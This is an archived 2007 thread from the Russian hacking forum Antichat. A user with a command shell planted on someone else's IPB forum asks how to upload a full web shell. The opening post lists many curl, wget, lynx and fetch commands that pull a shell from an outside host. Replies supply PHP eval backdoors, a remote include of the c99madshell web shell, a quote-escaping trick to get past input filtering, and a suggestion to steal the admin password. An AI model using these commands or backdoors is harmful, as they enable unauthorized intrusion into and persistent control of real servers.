ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу загрузка шелла на зеноне
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

загрузка шелла на зеноне
  #1  
Старый 19.08.2007, 19:04
Аватар для ysmat
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762

Репутация: -1
По умолчанию загрузка шелла на зеноне
у меня на форуме есть примитивный шелл вида
"<? system(\$cmd); ?>"
требуется залить файл полноценного шелла в папку uploads
перепробовал все известные загрузчики

curl wget get links lynx fetch GET lwp-mirror
Код:
http://***********/forum/cache/lang_cache/ru/1.php?cmd=curl --output /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=wget -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=get http://files.adamant.ua/3824 > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=links -source "http://files.adamant.ua/3824" > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=lynx -source http://files.adamant.ua/3824 > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=fetch -o /***********/www/forum/uploads/2.php -p http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=wget -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=curl -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=fetch -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=lynx -source "http://files.adamant.ua/3824" > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=links  -source "http://files.adamant.ua/3824" > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=GET http://files.adamant.ua/3824 > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=lwp-mirror http://files.adamant.ua/3824 /***********/www/forum/uploads/2.php
ни один не сработал
хотя шелл cmd работает
файл 1.txt создается
_http://***********/forum/cache/lang_cache/ru/1.php?cmd=echo текст > /***********/www/forum/uploads/1.txt
может еще есть какие методы загрузки
форум ipb 2.1.4 и находится находиться на хостинге зенон
 
Ответить с цитированием

  #2  
Старый 19.08.2007, 19:09
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию
Ты посмотри может там воще качалок нету. Или права на запись отсуствуют. Как писал уже качалки смотреть пример:which wget. И так и другие проверяешь.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #3  
Старый 19.08.2007, 19:20
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию
создай файл abc.php
Затем впиши echo '<?php eval($_GET[cmd]);?>' в файл abc.php
то потом просто пиши
abc.php?cmd=$f=fopen($_GET[r],$_GET[rr]);$o=fopen($_GET[o],$_GET[oo]);while(!feof($f)){$row=fgets($f);fputs($o,$row);} &rr=r&oo=w+&r=http://www.yoursite.com/shell.txt&o=shell.php
 
Ответить с цитированием

  #4  
Старый 19.08.2007, 22:00
Аватар для ysmat
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762

Репутация: -1
По умолчанию
не могу создать файл abc.php
с содержимым '<?php eval($_GET[cmd]);?>'
с простым текстом создается _http://*******/forum/cache/lang_cache/ru/1.php?cmd=echo текст > /*******/forum/uploads/abc.php
_http://*******/forum/cache/lang_cache/ru/1.php?cmd=echo '<?php eval($_GET[cmd]);?>' > /*******/forum/uploads/abc.php не проходит
вероятно не нравятся спец символы в '<?php eval($_GET[cmd]);?>'
 
Ответить с цитированием

  #5  
Старый 19.08.2007, 22:08
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию
Цитата:
Сообщение от fly  
создай файл abc.php
Затем впиши echo '<?php eval($_GET[cmd]);?>' в файл abc.php
то потом просто пиши
abc.php?cmd=$f=fopen($_GET[r],$_GET[rr]);$o=fopen($_GET[o],$_GET[oo]);while(!feof($f)){$row=fgets($f);fputs($o,$row);} &rr=r&oo=w+&r=http://www.yoursite.com/shell.txt&o=shell.php
Зачем столько трудностей?
Содержание файла должно быть просто
PHP код:
<?
eval($_GET['cmd']);
?>
И вообще можно просто инклудить веб-шелл, например
PHP код:
<?
include('http://dermoshell.narod.ru/c99madshell.php');
?>
 
Ответить с цитированием

  #6  
Старый 19.08.2007, 23:17
Аватар для ysmat
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762

Репутация: -1
По умолчанию
проблема в том что не получается вобще создать
файл с спец символами через строку браузера
например
http://**********/forum/cache/lang_cache/ru/1.php?cmd=echo текст > /**********/forum/uploads/2.php
все нормально на сервере создается файл 2.php с содержимым текст

http://**********/forum/cache/lang_cache/ru/1.php?cmd=echo <? eval($_GET['cmd']); ?> > /**********/forum/uploads/2.php
создается пустой файл 2.php код <? eval($_GET['cmd']); ?> не проходит
 
Ответить с цитированием

  #7  
Старый 20.08.2007, 23:50
Аватар для ysmat
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762

Репутация: -1
По умолчанию
не проходят символы >< () причем перевод их в hex %3E%3C%28%29
не помогает как ето можно обойти
 
Ответить с цитированием

  #8  
Старый 30.08.2007, 22:40
Аватар для mister
mister
Познающий
Регистрация: 24.07.2007
Сообщений: 31
Провел на форуме:
1417840

Репутация: 35
Отправить сообщение для mister с помощью ICQ
По умолчанию
Код:
echo '<?php eval($_GET[\'cmd\']) ?>' > куда.php
обрати внимание на кавычки
Последний раз редактировалось mister; 30.08.2007 в 22:46..
 
Ответить с цитированием

  #9  
Старый 30.08.2007, 23:39
Аватар для Shagon
Shagon
Новичок
Регистрация: 22.07.2007
Сообщений: 5
Провел на форуме:
43348

Репутация: 0
По умолчанию
Ммм а пасс админа если сныкать и залить из админки шелл в папку со смайлами?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблемы с заливкой шелла _-Ramos-_ *nix 12 27.07.2007 19:29
Загрузка шелла в 4images используя админ панель. GrAmOzEkA Уязвимости 7 06.03.2007 12:12
Загрузка шелла через JavaScript olen Болталка 6 03.09.2006 06:14
UBB Threads 6.5.1 (Инструкция по заливке шелла) pch Форумы 0 30.04.2006 20:20
Вопрос про загрузку шелла в форуме IPB africanec Форумы 29 28.09.2005 15:14



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ